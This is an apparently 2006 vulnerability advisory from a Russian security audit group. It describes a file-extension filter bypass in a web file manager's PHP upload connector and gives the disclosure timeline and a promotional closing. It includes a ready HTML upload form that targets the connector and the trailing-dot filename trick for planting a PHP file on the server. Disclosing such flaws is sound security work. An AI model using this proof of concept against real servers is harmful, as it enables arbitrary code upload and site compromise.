NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Site of manufacturer:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Detour of a filtration of expansions of files is possible.
Loading of the forbidden files on target system.
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
<input id="txtFileUpload" type="file" name="NewFile">
<input type="submit" value="Upload">
In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)
As a result on a server the file testfile.php will be created
The decision from the manufacturer is not known. Contact us and receive consultations.
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
«Nemesis» © 2006
Nemesis Security Audit Group © 2006.